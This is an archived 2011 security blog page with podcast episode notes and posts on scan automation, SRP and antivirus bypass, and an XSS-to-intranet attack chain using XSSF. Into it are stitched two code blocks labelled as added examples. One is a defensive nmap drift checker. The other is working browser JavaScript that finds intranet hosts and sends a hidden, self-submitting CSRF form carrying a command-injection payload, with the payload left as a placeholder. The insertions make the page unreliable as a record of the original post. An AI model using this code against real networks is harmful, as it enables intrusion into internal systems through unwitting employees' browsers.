Courses:
Offensive Countermeasures: The Art Of Active Defense: SANSFIRE June 15-16, Black Hat USA July 27-28 & 29-30
Defensive Countermeasures: Foundations for Becoming A Devious Defender: Black Hat USA July 27-28 & 29-30

Conferences:
Check out the entire PaulDotCom crew at BSidesRI June 14-15!




July 2011 Archives

PaulDotCom Security Weekly Episode 253 Part 1


In part 1 we interview Nick Selby, a newly minted police officer in the Dallas-Fort Worth area. He was an information security analyst and consultant for nine years, has worked in physical security and intelligence consulting in various roles since 1993, and in a previous life was a travel writer covering European destinations.


Episode 253 Show Notes

Episode 253 Part 1 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, Carlos Perez, Larry Pesce


The list below may sound like eight different guests, but it seems that special guest Nick Selby has been at one point or another, pilot, travel writer, sound engineer (for RUN DMC no less), editor, webmaster and, more recently, law enforcement officer and blogger.

Join us tonight at 7:30 PM EDT for Episode 253, where Nick will expound on Selby's First Law: "If your network security framework for law enforcement has a number in its name, it's not basic enough."

Be sure to catch the interview as it was meant to be enjoyed, live, via the link below:

NOTE: The video will play the most recent show up until we are live!

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 253 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand and Mike Perez.

The Rise Of Security Monkeys


As much as possible, we need to automate security testing. I know this always starts a flame war, but as networks grow more complex, especially with virtualization, it only gets more important. Example: Netflix published how they manage their infrastructure, and it is a sharp contrast to the way we've managed in the past. The old way is "OMG, don't touch it, you might break it." Well, if you can break it, there's something that needs to be fixed, and if you don't know what's broken, how can you fix it? Netflix goes so far as to take down portions of their environment on purpose and watch how it reacts. Now, as Mortman says, "careful with live ammo." But this is how I always wanted to manage a network: in a controlled environment, test performance, reliability, and security, then fix the problems you find. If you have fail-over, force it to fail over. Scan the network constantly; if stuff crashes or has vulnerabilities, fix it. It's almost as if we need a QA department within every IT department, testing on a regular schedule and tracking the fixes. Better that you find the weaknesses than wait for an attacker or a "network anomaly" to find them for you, leaving you in firefighting mode with management breathing down your neck.
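To make the "scan constantly, track the fixes" idea concrete, here is an added example (not code from the original post, and not Netflix's tooling): a small security monkey that reads two nmap greppable (-oG) snapshots of the same network, reports what drifted between them, and turns each change into a work item with a question an owner has to answer. The two snapshots are constructed sample data, not output from a real scan.

```javascript
// Added example, not code from the original post or from Netflix: a small
// "security monkey" that reads two nmap greppable (-oG) snapshots of the same
// network and reports drift between them, so a scheduled scan becomes a QA
// check that raises tickets instead of a report nobody reads.
// The snapshot text below is constructed sample data, not a real scan.

// Parse nmap -oG output into { host: { "port/proto": { state, service, version } } }.
// nmap writes "/" inside version strings as "|" in -oG, so splitting on "/" is safe.
function parseGnmap(text) {
  const hosts = {};
  for (const rawLine of text.split("\n")) {
    const line = rawLine.trim();
    // Comment lines and "Status: Up" lines carry no ports; they are skipped.
    const hostMatch = line.match(/^Host:\s+(\S+)/);
    const portsMatch = line.match(/Ports:\s+(.*?)(?:\s+Ignored State:.*)?$/);
    if (!hostMatch || !portsMatch) continue;
    const host = hostMatch[1];
    hosts[host] = hosts[host] || {};
    for (const entry of portsMatch[1].split(/,\s*/)) {
      // -oG field order: port/state/proto/owner/service/rpc/version/
      const f = entry.split("/");
      if (f.length < 7) continue;
      hosts[host][`${f[0]}/${f[2]}`] = { state: f[1], service: f[4], version: f[6] };
    }
  }
  return hosts;
}

// Compare two parsed snapshots. Everything listed here changed without anyone
// telling the security team, which is exactly the point of running this.
function diffScans(baseline, current) {
  const drift = { newHosts: [], goneHosts: [], newPorts: [], closedPorts: [], changedServices: [] };
  for (const host of Object.keys(current)) if (!(host in baseline)) drift.newHosts.push(host);
  for (const host of Object.keys(baseline)) if (!(host in current)) drift.goneHosts.push(host);
  for (const [host, after] of Object.entries(current)) {
    const before = baseline[host] || {};
    for (const [port, a] of Object.entries(after)) {
      const b = before[port];
      if (!b) drift.newPorts.push(`${host} ${port} ${a.service}`);
      else if (b.service !== a.service || b.version !== a.version)
        drift.changedServices.push(`${host} ${port}: ${b.version || "?"} -> ${a.version || "?"}`);
    }
    for (const port of Object.keys(before)) if (!(port in after)) drift.closedPorts.push(`${host} ${port}`);
  }
  return drift;
}

// Turn drift into trackable work items. A "fix" is either a change rolled
// back or a change explained and recorded; silence is not an option.
function ticketsFor(drift) {
  const t = [];
  drift.newHosts.forEach(h => t.push({ sev: "high", item: h, ask: "new host: who owns it and why is it reachable?" }));
  drift.newPorts.forEach(p => t.push({ sev: "high", item: p, ask: "new listener: approved change or not?" }));
  drift.changedServices.forEach(s => t.push({ sev: "medium", item: s, ask: "version changed: patched, or replaced by something else?" }));
  drift.closedPorts.forEach(p => t.push({ sev: "low", item: p, ask: "listener gone: intended, or a service that died?" }));
  drift.goneHosts.forEach(h => t.push({ sev: "low", item: h, ask: "host gone: decommissioned, or down?" }));
  return t;
}

// Constructed sample snapshots (last week's baseline, this week's scan).
const BASELINE = [
  "# Nmap 5.51 scan initiated (constructed sample, not a real scan)",
  "Host: 10.0.0.5 ()\tStatus: Up",
  "Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.2.15/\tIgnored State: closed (998)",
  "Host: 10.0.0.9 ()\tPorts: 443/open/tcp//https//nginx 1.0.4/\tIgnored State: filtered (999)",
].join("\n");

const LATEST = [
  "Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.2.15/, 8080/open/tcp//http-proxy//Squid http proxy 3.1/\tIgnored State: closed (997)",
  "Host: 10.0.0.9 ()\tPorts: 443/open/tcp//https//nginx 1.0.6/\tIgnored State: filtered (999)",
  "Host: 10.0.0.12 ()\tPorts: 3389/open/tcp//ms-term-serv///\tIgnored State: closed (999)",
].join("\n");

function runMonkey() {
  return ticketsFor(diffScans(parseGnmap(BASELINE), parseGnmap(LATEST)));
}

for (const t of runMonkey()) console.log(`[${t.sev}] ${t.item} -- ${t.ask}`);
```

Run it from cron after each scheduled `nmap -sV -oG` against the same scope and feed the tickets into whatever tracker the team already uses; the value is not in the diff itself but in the habit of making every unexplained change somebody's job to explain before an attacker finds it.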

That... And this post is merely an excuse to have a picture of the Simpsons Smoking Monkeys..

Look!! He's taking another puff!!!!

Remember, good security is really just good systems administration. We strongly recommend reading the Visible Ops documents.

PaulDotCom Security Weekly Episode 252


In this episode we interview Matt Yoder! Matt is a lover of fine pens and paper, and a pencrafter. He has also spent time, in multiple stints, performing direct security consulting, including assessment and auditing, security systems support, and firewall deployment. He currently spends his days, and earns something resembling an income, assisting with server administration for a major University in the midwest, which prefers to go unnamed. (Due to audio problems we are unable to release the video, sorry about that!)

Then, during the drunken security news segment, we discuss how wide open your voicemail is, the rise of security monkeys, rent-a-laptop, the orange cartoon octopus virus, stroke development, a hacking epidemic, and attacks on small firms:

Episode 252 Show Notes

Episode 252 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, Carlos Perez, John Strand, & Jack Daniel


A number of my students have been asking why bypassing Software Restriction Policies (SRP) matters. This trickle of questions started the first time I taught SANS 660 Advanced Network Penetration Testing and has continued through the other classes I have taught over the past few months.

We at PDC have been testing a number of Citrix implementations, and bypassing SRP is becoming as important as bypassing AV. The reason is that once you can bypass SRP, the whole arsenal of the command line is at your disposal. Look, the ability to upload Meterpreter is great. However, when attacking a domain there are a number of additional commands and Windows snap-ins that are essential for owning it. Thankfully, there are a number of outstanding resources available online. One of them is Wicked Clown.

Here are a few of his outstanding videos. You know the videos are good because I generally hate clowns.

Left me scarred for life...

The final reason bypassing SRP is so important is that it highlights the risk of a standard user account being used to attack the rest of the domain using built-in tools.

I would also like to say thanks to Peter Danhieux for putting together a number of outstanding SRP bypass attacks.

-strandjs

PaulDotCom Security Weekly Episode 251 Part 2


David Kennedy, Jim O'Gorman, Devon Kearns, join us to talk about their new book! (Mati Aharoni is also an author but could not make it). "...while Metasploit is used by security professionals everywhere, the tool can be hard to grasp for first-time users. Metasploit: The Penetration Tester's Guide fills this gap by teaching you how to harness the Framework and interact with the vibrant community of Metasploit contributors."

Drunken security news, including: Hacking femtocell, Wifi hacker sent to jail, losing your phone at the airport, RIP Win XP, long live "Hef", binary C&C over HTTP, fresh PuTTY, Loki explained, RFID bootable distro, process injection, shoulder surfing FTW.

Episode 251 Show Notes

Episode 251 Part 2 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, Carlos Perez, Larry Pesce


PaulDotCom Security Weekly Episode 251 Part 1


In part 1 we interview Claudio Criscione, a security test engineer at Google. Before joining the company in 2011, Claudio was a penetration tester for most of his career, assessing the security of large infrastructures and holding roles in web application and virtualization security.

Video of the interview with Claudio:

Episode 251 Show Notes

Episode 251 Part 1 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, Carlos Perez, Larry Pesce


We're back to our regular podcast schedule tonight with Matt Yoder, Death Envelope extraordinaire, for Episode 252. Catch the interview as it was meant to be watched, live, via the link below:

NOTE: The video will play the most recent show up until we are live!

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 252 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand and Mike Perez.

PaulDotCom Security Weekly Episode 250 Part 2


Part 2 of episode 250 was a wild ride! Our friends, including Caitlin Johansen from Core Security, Bill and Trent from i-hacked, and Dave "I give big hugs" Kennedy, join us to reflect on the past 250 episodes of PaulDotCom:

"What I Learned on PaulDotCom"
"Top Ten Things I Learned on PaulDotCom"

Then, we get really drunk and talk about security news:

Episode 250 Show Notes

Episode 250 part 2 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, Carlos Perez, Larry Pesce


PaulDotCom Security Weekly Episode 250 Part 1


Sorry for the long delay! Our new production system is still a work in progress, and you will see episodes released more promptly. Our 250th episode was extremely special, featuring Randal Schwartz and a host of good friends and familiar faces!

In part 1 we interview Randal Schwartz:

Episode 250 Show Notes

Episode 250 part 1 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, Carlos Perez, Larry Pesce


On Bypassing AV


One of the common questions I receive when teaching for SANS is how to bypass AV. I thought it would be fun to take a few moments to share some of the best articles I have read recently on the topic, along with a couple of pitfalls to avoid during the process.

First, if you are testing an organization that is using product X, buy product X. Many testers believe the best way to check whether their payload will be detected is to upload it to VirusTotal. VirusTotal is great for checking whether a piece of software is malware, but it is horrible for testing purposes, for a couple of reasons. First, for many vendors it does not represent what the real product would do on a real system. For example, Symantec has a detection called Suspicious.Insight that will show as a hit on VirusTotal but won't do a thing on an actual endpoint. Further, several AV products use more in-depth heuristic checks that are not exercised by a VirusTotal scan. Finally, and this is the big one, VirusTotal shares your samples with the AV vendors. This means you may bypass the AV product of your choice today, but they are quickly creating a signature to mess up your test tomorrow.

So, instead, we recommend you actually buy the product you are testing. I know that $50 or more seems like a lot to swing for a $25K engagement, but I think if you search your office couch you might be able to pull it off.

This couch does things for its money.. Horrible, degrading, things.


Next, if you have to test against multiple products, use NoVirusThanks instead, which offers a multi-engine scan without the sample sharing.


On to the articles. There are two main ones I would like to share. Both have outstanding explanations and will show you why this is not a point-and-click endeavor.

The first up is from ScriptJunkie. This is an outstanding write-up.

Next, mihi has what can be described as the closest thing to a step-by-step walkthrough available.

Please remember that this is a process that is not easy and will change constantly. But that is a good thing. It keeps our jobs from simply becoming Nessus/Metasploit/SET, do da, do da.

-strandjs

...as if we need another example of why XSS is dangerous...

If you're not using the XSS Framework (XSSF), then you should be.

XSSF is written by Ludovic Courgnaud (CONIX Security) and is described as "a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation." Immediately, you should be thinking BeEF. XSSF is similar to BeEF in how it injects itself into the victim's web browser and creates a communication channel back to the attacker, but it has some distinct advantages. The largest of these is that it is built on top of the Metasploit Framework (MSF). While BeEF requires the complete development of custom exploits or the addition of a BeEF <-> MSF interface (note the recent addition of MSF browser_autopwn to BeEF), XSSF is designed to use existing MSF browser exploits and modules natively. This is scalable and convenient, and as a result XSSF inherits a large community of developers. XSSF is written in Ruby and is quite stable. I have been playing with it and using it on assessments and have yet to encounter a crash or bug. It just works. In fact, I've tried some stuff that I fully expected to break the framework, yet it worked perfectly. Like BeEF, XSSF comes prepackaged with built-in auxiliary modules tailored specifically for leveraging browser-side functionality. Some of these are POCs still in development, but the POCs work, and with some slight tweaking they can become real-world-usable modules.

The only issue I've encountered with XSSF to date is that XSSF is not part of the MSF svn trunk. Because of this, if you svn checkout XSSF on top of MSF, as the instructions say, you will break the ability to update either framework. I submitted the issue to Ludovic, and his recommendation was to preserve the integrity of the MSF svn tree by using the svn export command for the XSSF trunk, which updates all XSSF core files and leaves out the .svn metadata. This could leave stale files behind if XSSF files are removed from its trunk at a later date, but until MSF includes XSSF in their official trunk, this is what we're left with. A small sacrifice for such great benefits.

Okay, that's a brief overview of XSSF. Now on to what motivated me to write this blog post.

This afternoon I was demoing XSSF for some of my students. I was loading up existing MSF modules such as the signed java applet browser exploit and popping meterpreter shells on fully patched Windows 7 boxes with fully patched browsers. While this was making the desired impact, I wanted to show the students how I could further leverage XSSF to expand the attack surface. I came up with the following scenario.

The scenario:
An attacker sits outside a corporate network, separated from it by a standard security stack (firewall, IDS, border router, etc.). Within the corporate network are employees who have outbound access to the internet. Also within the corporate network is an intranet web server that is only available to internal network users. NOT public facing. The objective of the attacker is shell access to the intranet web server.

The attack:
Through open source research and social engineering, the attacker is able to figure out that the organization is running a web app on their intranet web server that is vulnerable to remote command execution. Here is what the attack looks like.

Step one, hook an internal victim browser via XSS.

Step two, use xssf_tunnel or another module (visited_pages) to confirm that the user has access to the internal web server. During this step, the attacker also notes the IP address or hostname of the internal web server and the application it runs.

Step three, the attacker starts a listener to accept inbound connections on his attack machine and uses the xssf_csrf module to send a remote command execution payload to the vulnerable web app. The RCE payload will call back to the attacker's machine using a technique such as those found here.

Step four, the attacker receives the connection from the intranet web server and pilfers target data. At this point, the browser hook is no longer needed. If the victim kills the XSSF session by closing their browser, it does not affect the rest of the attack. The attacker is connected directly to the web server.
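The browser-side half of steps two and three, written out as plain JavaScript so the mechanism is visible without the framework. This is an added example, not XSSF's code and not something the post shows. Everything target-specific in it is an assumption: the visited URLs are a constructed sample, the intranet application path and its parameter are hypothetical, and the RCE payload is left as a placeholder rather than a working command.

```javascript
// Added example, not XSSF's code and not from the original post: what the
// hooked browser itself runs for steps two and three, as plain browser
// JavaScript. The visited URLs are constructed, the intranet app path
// "/tools/ping.php" and its "host" parameter are hypothetical, and the RCE
// payload is a placeholder, not a working one.

// Step two: find intranet origins among URLs the hooked browser already
// knows about (the idea behind XSSF's visited_pages module). RFC 1918
// addresses, single-label hostnames and internal DNS suffixes are the usual
// tells for "not reachable from the outside".
function internalTargets(urls) {
  const origins = new Set();
  for (const raw of urls) {
    let u;
    try { u = new URL(raw); } catch (e) { continue; }   // skip junk entries
    const h = u.hostname;
    const rfc1918 = /^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)\d+/.test(h);
    const singleLabel = !h.includes(".");
    const internalSuffix = /\.(local|internal|corp|lan)$/i.test(h);
    if (rfc1918 || singleLabel || internalSuffix) origins.add(u.origin);
  }
  return [...origins];
}

// Attribute-escape user-controlled values so the generated form stays valid
// whatever the payload contains.
function escapeAttr(s) {
  return String(s).replace(/&/g, "&amp;").replace(/"/g, "&quot;")
                  .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Step three: a self-submitting form is the simplest way to make the victim's
// browser POST to an origin the attacker cannot reach. A plain form post is a
// CORS "simple request", so there is no preflight to block it, and the
// attacker never needs to read the response: the shell comes back out of
// band from the intranet server itself.
function buildCsrfForm(action, fields) {
  const inputs = Object.entries(fields)
    .map(([k, v]) => `<input type="hidden" name="${escapeAttr(k)}" value="${escapeAttr(v)}">`)
    .join("");
  return `<form id="f" method="POST" action="${escapeAttr(action)}">${inputs}</form>` +
         "<script>document.getElementById(\"f\").submit()<\/script>";
}

// Browser glue: write the form into a hidden iframe so the victim's tab never
// visibly navigates away from the hooked page. Once the intranet server has
// called back, the hook session no longer matters.
function fireInHiddenFrame(html) {
  const frame = document.createElement("iframe");
  frame.style.display = "none";
  document.body.appendChild(frame);
  frame.contentDocument.open();
  frame.contentDocument.write(html);
  frame.contentDocument.close();
}

// Constructed sample of what a visited-pages probe might hand back.
const VISITED = [
  "https://www.example.com/news",
  "http://intranet/",
  "http://10.0.0.25/helpdesk/login",
  "http://mail.example.com/owa/",
  "not a url",
];

// Hypothetical vulnerable endpoint; the payload value is a placeholder only.
const PATH = "/tools/ping.php";
const PAYLOAD = { host: "127.0.0.1; <attacker callback command goes here>" };

// One forged request per discovered internal origin.
function planPivot(urls) {
  return internalTargets(urls).map(origin => ({ origin, html: buildCsrfForm(origin + PATH, PAYLOAD) }));
}

if (typeof document !== "undefined") {
  for (const p of planPivot(VISITED)) fireInHiddenFrame(p.html);
}
```

The defensive reading of the same code is the useful part: the intranet application never sees the attacker, only a POST from a logged-in employee's browser, so "internal only" is not a security boundary against CSRF, and a command-execution bug on an intranet box is reachable by anyone who can get JavaScript into a page that box's users visit.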

The conclusion is two-fold, XSSF kicks ass and XSS will still eat your lunch. Patch your boxes, actively monitor your systems, and educate your users.

This week, we podcast on Friday night at 7:30 PM EDT, with special guests in studio!

Episode 250's show notes will be updated as late as possible on Friday night to keep the surprise, but we promise an episode jam packed with references to Cyber Whacking, reflections on 250 episodes of beer soaked podcasting, and perhaps a song or two....

NOTE: The video will play the most recent show up until we are live!

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 250 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

Welcome back! After our break for the birthday of the U.S. and no live episode last Thursday, here is part 2 of episode 249. Kevin Fiscus from the NWN STAR team, and an all-around GREAT guy, joins us to discuss his work detecting base64 on the network using Snort and why it may be important. Then we recap the news the only way we know how.

Episode 249 Show Notes

Episode 249 part 2 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, Carlos Perez, Larry Pesce


ModSecurity Challenge


Are you one of those people who laugh in the face of the almighty WAF?

He named the mechanical bull WAF that day...


Then this is for you. A fine contest from Trustwave to test ModSecurity by trying to hack a site it protects. They have set up ModSecurity as a reverse proxy in front of four deliberately insecure demo web sites.

We love these kinds of challenges because they are a way for the open-source community and the pentest community to get together and actually make security better. Plus, it is an opportunity for you to show how awesome your skills are.

That.. And, theater sucks.

PaulDotCom will be teaching Offensive Countermeasures at Black Hat July 30-31